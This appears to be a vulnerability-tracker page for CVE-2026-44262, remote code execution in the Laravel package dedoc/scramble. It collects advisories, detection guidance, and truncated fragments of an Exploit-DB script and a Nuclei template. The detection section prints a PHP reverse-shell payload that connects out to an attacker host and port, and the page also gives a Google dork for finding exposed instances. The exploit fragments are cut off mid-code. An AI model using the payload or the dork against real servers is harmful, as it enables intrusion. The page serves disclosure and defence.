CVE-2026-44262
published 2026-05-12CVE-2026-44262: Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation…
PriorityP276critical9.4CVSS 3.1
AVNACLPRNUINSUCHIHAL
EXPLOIT
EPSS
5.86%
92.3th percentile
Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dedoc | scramble | — | — |
| dedoc | scramble | >= 0.13.2 < 0.13.22 | 0.13.22 |
Detection & IOCsextracted from sources · hover to see the quote
command$s=@fsockopen('{lhost}',{lport},$e,$m,30);if(!$s)return;$p=proc_open({shell},array(0=>$s,1=>$s,2=>$s),$pipes);if($p)proc_close($p);fclose($s);↗
- →Monitor HTTP requests to /docs/api.json containing PHP function names in query parameters (sleep, shell_exec, print, file_get_contents, fsockopen, proc_open) — these are injected as Laravel validation rule defaults to trigger RCE. ↗
- →Exploit identifies vulnerable parameters by checking OpenAPI spec query parameter 'default' values that match Laravel validation rule keywords or contain '|' — defenders should audit /docs/api.json schema defaults for user-controlled input reflected as validation rules. ↗
- →The exploit checks for a 200 HTTP response and presence of '"paths"' in the body to confirm the docs endpoint is publicly accessible — alert on unauthenticated access to /docs/api.json returning 200 with JSON body containing 'paths'. ↗
- →Timing-based detection: exploit sends a sleep() payload and measures response delay >= 75% of the sleep duration as confirmation of RCE — monitor for anomalously slow responses on /docs/api.json. ↗
- →Exploit output capture works by reading content appearing before the first '{' character in the JSON response body — PHP print/echo output from injected code leaks before the JSON structure begins. ↗
- →Google dork for exposed vulnerable instances: inurl:/docs/api.json "dedoc/scramble" ↗
- ·The vulnerability only exists when the /docs/api.json endpoint is publicly accessible (unauthenticated). Restricting access via middleware eliminates the attack surface without patching. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
dedoc scramble up to 0.13.21 code injection
vuldb·2026-05-12
CVE-2026-44262 [CRITICAL] dedoc scramble up to 0.13.21 code injection
A vulnerability classified as critical has been found in dedoc scramble up to 0.13.21. This issue affects some unknown processing. Performing a manipulation results in code injection.
This vulnerability is identified as CVE-2026-44262. The attack can be initiated remotely. There is not any exploit available.
It is recommended to upgrade the affected component.
GHSA
Scramble vulnerable to remote code execution via evaluation of user-controlled input in validation rules
ghsa·2026-05-06
CVE-2026-44262 [CRITICAL] CWE-94 Scramble vulnerable to remote code execution via evaluation of user-controlled input in validation rules
Scramble vulnerable to remote code execution via evaluation of user-controlled input in validation rules
### Impact
A remote code execution (RCE) vulnerability affects versions `0.13.2` through `0.13.21`. When documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context.
### Patches
Fixed in version `0.13.22`.
### Workarounds
If upgrading is not immediately possible:
* Restrict access to documentation endpoints (`/docs/api`, `/docs/api.json`)
* Avoid using user-controlled variables inside validation rule expressions (e.g., values derived from request input)
* Disable documentation endpoints in productio
No detection rules found.
Exploit-DB
scramble - Remote Code Execution
exploitdb·2026-05-27·CVSS 9.4
CVE-2026-44262 [CRITICAL] scramble - Remote Code Execution
scramble - Remote Code Execution
---
# Exploit Title: scramble - Remote Code Execution
# Google Dork: inurl:/docs/api.json "dedoc/scramble"
# Date: 2026-05-07
# Exploit Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Vendor Homepage: https://scramble.dedoc.co
# Software Link: https://github.com/dedoc/scramble
# Version: >=0.13.2, str:
if not target.startswith(("http://", "https://")):
target = "http://" + target
return target.rstrip("/")
def print_cookie_findings(cookies: list[str]):
for raw in cookies:
name = raw.split("=")[0].strip()
value_part = raw.split("=", 1)[1].split(";")[0].strip() if "=" in raw else ""
if name.upper() == "XSRF-TOKEN":
info(f"CSRF token (XSRF-TOKEN): {G}{value_part}{X}")
elif "session" in name.lower():
info(f"Session cookie '{name}': {G}{v
Nuclei
Scramble Laravel - Remote Code Execution
nuclei·CVSS 9.4
CVE-2026-44262 [CRITICAL] Scramble Laravel - Remote Code Execution
Scramble Laravel - Remote Code Execution
Scramble for Laravel >= 0.13.2 and = 0.13.2 and = 8"
- "status_code == 200"
condition: and
# digest: 4a0a0047304502201b8b3b4fae7a97422be0b91e5922323fb96f24f334486f59e782553fba200bf9022100c31bc7a90c9eac8f1d2b852398aef15db8e47c521dda812048ce0c95fd484e0e:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2026-05-12
Published